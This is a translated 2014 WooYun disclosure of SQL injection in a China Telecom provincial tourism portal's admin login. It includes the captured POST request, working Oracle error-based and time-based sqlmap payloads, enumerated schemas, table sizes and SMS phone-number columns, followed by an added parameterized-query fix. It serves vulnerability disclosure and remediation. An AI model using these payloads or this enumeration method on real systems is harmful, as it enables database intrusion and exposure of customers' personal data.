
Vulnerability summary (24 followers)

Defect ID: wooyun-2014-082767

Title: SQL injection in a China Telecom provincial website (suspected to affect ten million records)

Vendor: China Telecom

Author: 路人甲

Submitted: 2014-11-11 15:27

Fixed: 2014-12-26 15:28

Published: 2014-12-26 15:28

Type: SQL injection vulnerability

Severity: High

Self-assessed Rank: 20

Status: handed over to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2014-11-11: details sent to the vendor; awaiting vendor handling
2014-11-14: vendor confirmed; details disclosed to the vendor only
2014-11-24: details disclosed to core white hats and relevant domain experts
2014-12-04: details disclosed to regular white hats
2014-12-14: details disclosed to intern white hats
2014-12-26: details disclosed to the public

Brief description:

That's right, it's ten million
right, it's ten million
it's ten million
ten million

...

Detailed description:

Heilongjiang Telecom Digital Tourism Portal _ back-end administration and maintenance
Link: http://www.gzbg100.cn/sysadmin/Login.aspx

[Screenshot: 16.jpg]


The login form is injectable: entering ' in the username and password fields throws an error straight away.

[Screenshot: 17.jpg]


The CAPTCHA is only checked for validity; it never expires.
POST request:

POST /sysadmin/Login.aspx HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.gzbg100.cn/sysadmin/Login.aspx
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: www.gzbg100.cn
Content-Length: 361
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASP.NET_SessionId=w0ctrju5zcbqdw55uiot0h45
__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUJOTI4MjE5NjI1ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUIYnRuTG9naW4FCGJ0blNwUmVnBmGi4hqICb4u6KAz35K7NqMua7k%3D&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=%2FwEWBgKXyKGvBAKl1bKzCQKd%2B7qdDgKY2YWXBgKC3IeGDAKNt7ybCQwP4hOwri06ABc6B3P7yglAd%2FNk&txtUserName=aaa&txtPwd=aaa&txtCheckCode=6146&btnLogin.x=0&btnLogin.y=0


Proof of vulnerability:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: txtUserName
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: __LASTFOCUS=&__VIEWSTATE=/wEPDwUJOTI4MjE5NjI1D2QWAgIDD2QWAgIHDw9kFgIeB29uY2xpY2sFFHJldHVybiBjaGVja0lucHV0KCk7ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUIYnRuTG9naW4FCGJ0blNwUmVnB5/qvGwf8XhrP/uBSB+IpTzXwNU=&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWBgLaxv3UCQKl1bKzCQKd+7qdDgKY2YWXBgKC3IeGDAKNt7ybCV7wzdzOvML8yuz7RZElCgc5cuOr&txtUserName=aaa' AND 7718=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(111)||CHR(103)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (7718=7718) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(121)||CHR(102)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND 'dHGr'='dHGr&txtPwd=aaa&txtCheckCode=0441&btnLogin.x=0&btnLogin.y=0
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: __LASTFOCUS=&__VIEWSTATE=/wEPDwUJOTI4MjE5NjI1D2QWAgIDD2QWAgIHDw9kFgIeB29uY2xpY2sFFHJldHVybiBjaGVja0lucHV0KCk7ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUIYnRuTG9naW4FCGJ0blNwUmVnB5/qvGwf8XhrP/uBSB+IpTzXwNU=&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWBgLaxv3UCQKl1bKzCQKd+7qdDgKY2YWXBgKC3IeGDAKNt7ybCV7wzdzOvML8yuz7RZElCgc5cuOr&txtUserName=aaa' AND 7855=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'uHrR'='uHrR&txtPwd=aaa&txtCheckCode=0441&btnLogin.x=0&btnLogin.y=0
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle
current schema (equivalent to database on Oracle): 'SYSMANAGER'
current user is DBA: False
available databases [18]:
[*] COUPON
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSMANAGER
[*] SYSTEM
[*] TG
[*] TSMSYS
[*] WMSYS
[*] XDB
Database: SYSMANAGER
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| SMSSEND_BACK | 9966936 |
| SMS_APP_PHONES | 8387577 |
| TBCUSTCOUNT | 897976 |
| SMSSEND | 743361 |
| TBCOUPONCARD | 231471 |
| TB_GUEST_INFO | 177577 |
| TB_ADV_CLICK | 133270 |
| TEMP_SMS | 56955 |
| TB_COMMON_GUESTCOMMENT | 22868 |
| TB_SSOLOGS | 19428 |
| RESTINFO | 13752 |
| RESTPIC | 9474 |
| TB_LOGINFO | 8270 |
| TB_HDM_PICTURE | 3506 |
| TB_TLSUBPAGE_MAPTO_SCENIC | 884 |
| TB_DINING_BASICINFO | 694 |
| TB_TRAVEL_REGUSER | 663 |
| SMS_APP_MESSAGES | 609 |
| TBCOUPON | 595 |
| TB_TRAVEL_LINEPLAN | 528 |
| TB_KEYWORDS_FILTER | 525 |
| TB_NEWS_INFO | 454 |
| TB_SCENIC_INFO | 425 |
| TB_CODEDEFINE | 409 |
| TB_SCENIC_RESERVE | 332 |
| TB_AUTHORITY | 329 |
| TB_SCENIC_INFO_BAK_0528 | 318 |
| TB_COMPLAINT | 290 |
| TB_MARKET_INFO | 271 |
| TB_HOTEL_BASEINFO | 269 |
| TB_PLAY_BASEINFO | 261 |
| TB_PERFORMER_INFO | 242 |
| TBTERMINALTRAD | 228 |
| TB_USERROLE | 163 |
| TBMERCHANT | 157 |
| TB_SCENIC_BAK | 149 |
| TB_TRAVELINE_SUBPAGE_LEVEL2 | 149 |
| TB_ADV_INCOME | 141 |
| TB_TRAVEL_LINE | 132 |
| TB_ADV_DETAIL | 126 |
| TB_USERINFO | 124 |
| TB_ORDER_HOTEL | 115 |
| TB_VALIDCODE | 113 |
| TB_FUNCTIONS111 | 103 |
| TB_FUNCTIONSBAK | 103 |
| TB_FUNCTIONS | 92 |
| TB_RAFFLE | 60 |
| TB_ORDER_SCENIC | 55 |
| TB_TRAVEL_INFO | 48 |
| TB_BALANCE | 42 |
| TB_COMMON_PAGESETINFO | 40 |
| TBCATE | 40 |
| SMS_APP_USERINFO | 39 |
| TB_ADV_LIMIT | 34 |
| TB_ORDER_DINING | 34 |
| TB_ADV_INFO | 30 |
| TB_TRAVELINE_SUBPAGE_LEVEL1 | 28 |
| TB_ORDER_PLAY | 26 |
| MISSM_MESSAGE | 24 |
| TB_KNOWLEDGEBASE_INFO | 24 |
| TB_PAYLOG | 22 |
| TB_USR_INFO | 19 |
| TB_ROLES | 18 |
| TB_MISSMNEWS_INFO | 17 |
| TB_NEWS_COLUMN | 17 |
| TBCOUPOUORDER | 16 |
| TB_ORDER_LINE | 15 |
| TB_TRAVEL_BUSTYPE | 15 |
| TB_DINING_CUISINETYPE | 14 |
| TB_TRAVEL_GUIDE | 14 |
| TB_TRAVEL_INCOME | 14 |
| TB_AREA | 13 |
| TB_AREA_WEATHERURL | 13 |
| TB_BUSINESS_INFO | 13 |
| TB_TUAN_CITY | 13 |
| TB_TRAVEL_GROUP | 12 |
| TB_HOTEL_GROOMTYPE | 10 |
| TB_MOBILE_AREA | 10 |
| TB_MOBILE_VOUCHER | 10 |
| TB_MOBILE_CODEDEFINE | 9 |
| TB_CALENDAR | 8 |
| TB_MOBILE_SERVICE | 8 |
| TB_SHOPPING_SCENIC | 8 |
| TB_DEPARTMENT | 7 |
| TB_MOBILE_CATEGORY | 7 |
| TB_MOBILE_POSITION | 7 |
| TB_MOBILE_SPACE | 7 |
| TB_TUAN_DINGDAN | 7 |
| TB_FAVORITES | 6 |
| TB_MOBILE_COMPANY | 6 |
| TB_MOBILE_CUSTOMER | 6 |
| TMP_TESTORDER | 6 |
| TB_ADVANCE_BOOKING | 5 |
| TB_DINING_CUISINEINFO | 5 |
| TB_TRAVEL_BUSINFO | 5 |
| TBCOUPONUSER | 5 |
| TB_KNOWLEDGEBASE_TYPE | 4 |
| TB_MOBILE_PARAMETER | 4 |
| TB_MOBILE_PRODUCT | 4 |
| TB_PRIVILEGE | 4 |
| TB_TUAN_CODEDEFINE | 4 |
| TB_HOTEL_RESERVE | 3 |
| TB_MOBILE_BOOKING | 3 |
| TB_ORDER_THEMES | 3 |
| TB_SSOSITE | 3 |
| TB_TUAN_USER | 3 |
| TB_MOBILE_ADDRESS | 2 |
| TB_MOBILE_ALBUM | 2 |
| TB_MOBILE_MEDIA | 2 |
| TB_MOBILE_SESSION | 2 |
| TB_NEWS_TITLEPREV | 2 |
| TB_TUAN_USERRELATION | 2 |
| TB_BARCODE_CONFIG | 1 |
| TB_MOBILE_AROUND | 1 |
| TB_MOBILE_CAMERA | 1 |
| TB_MOBILE_CRITICAL | 1 |
| TB_MOBILE_DAILY | 1 |
| TB_MOBILE_LOCATION | 1 |
| TB_NEWS_CONTENTTEMPLATE | 1 |
| TB_ROLLINFO | 1 |
| TB_TUAN_BBS | 1 |
| TB_TUAN_PROJECTS | 1 |
| TB_VERSION | 1 |
+-----------------------------+---------+
Database: SYSMANAGER
Table: SMSSEND_BACK
[10 columns]
+------------+----------+
| Column | Type |
+------------+----------+
| ADDDATE | DATE |
| CONTENT | VARCHAR2 |
| OUT_SMSID | NUMBER |
| PHONENUM | VARCHAR2 |
| SENDDATE | DATE |
| SENDNUM | VARCHAR2 |
| SENDRESULT | NUMBER |
| SENDSTATUS | NUMBER |
| SMSID | NUMBER |
| TYPE | NUMBER |
+------------+----------+
The data itself is not pasted here~

Fix recommendation:

Filter user input.
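The filtering suggested above is safest done by keeping user input out of the SQL text entirely. The handler below is an added example, not code from the site or from the reporter: it binds txtUserName as a parameter, consumes the CAPTCHA on first use (the report notes it never expired), and returns one generic failure message instead of the error the screenshots show. ODP.NET, Forms authentication, a Label named lblMsg, the PWDSALT/PWDHASH columns on TB_USERINFO and Session["CheckCode"] are assumptions.

```csharp
// Added example, not the site's code. Assumes ODP.NET, Forms authentication, a
// Label named lblMsg, hypothetical PWDSALT/PWDHASH columns on TB_USERINFO, and
// that the CAPTCHA generator stored its text in Session["CheckCode"].
using System.Configuration;
using System.Security.Cryptography;
using System.Web.Security;
using System.Web.UI;
using Oracle.ManagedDataAccess.Client;

public partial class Login : Page
{
    protected void btnLogin_Click(object sender, ImageClickEventArgs e)
    {
        // The CAPTCHA is consumed on first use, so a captured code cannot be
        // replayed across an automated run; every failure gets one generic message.
        string expected = Session["CheckCode"] as string;
        Session.Remove("CheckCode");
        if (expected == null || expected != txtCheckCode.Text) { Fail(); return; }

        byte[] salt = null, hash = null;
        string cs = ConfigurationManager.ConnectionStrings["SysManager"].ConnectionString;
        using (var conn = new OracleConnection(cs))
        using (var cmd = new OracleCommand(
            "SELECT PWDSALT, PWDHASH FROM TB_USERINFO WHERE USERNAME = :uname", conn))
        {
            // Bound parameter: a quote or "AND ... FROM DUAL" in txtUserName is
            // just a string value, so error-based and time-based payloads are inert.
            cmd.BindByName = true;
            cmd.Parameters.Add("uname", OracleDbType.Varchar2).Value = txtUserName.Text;
            conn.Open();
            using (OracleDataReader r = cmd.ExecuteReader())
                if (r.Read()) { salt = (byte[])r[0]; hash = (byte[])r[1]; }
        }

        // The password is checked in code (PBKDF2, constant-time compare), never in SQL.
        if (salt != null && VerifyPassword(txtPwd.Text, salt, hash))
            FormsAuthentication.RedirectFromLoginPage(txtUserName.Text, false);
        else
            Fail();
    }
    private void Fail() { lblMsg.Text = "Login failed"; }
    private static bool VerifyPassword(string pwd, byte[] salt, byte[] stored)
    {
        byte[] computed = new Rfc2898DeriveBytes(pwd, salt, 100000).GetBytes(stored.Length);
        int diff = 0;
        for (int i = 0; i < stored.Length; i++) diff |= computed[i] ^ stored[i];
        return diff == 0;
    }
}
```

Turning off detailed error pages (customErrors in web.config) closes the error-based channel independently of the query fix; the time-based channel only goes away once input is bound as a parameter.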

Copyright notice: please credit the source when reposting: 路人甲@WooYun


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed at: 2014-11-14 17:46

Vendor reply:

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2014-11-11 16:48 | sec_jtn ( Regular white hat | Rank:134 Vulnerabilities:56 | I wanted to shamelessly farm rank, then found I was overthinking it....)

    Why are you so awesome? Such a nice day and instead of going out to hook up you come to WooYun to hack sites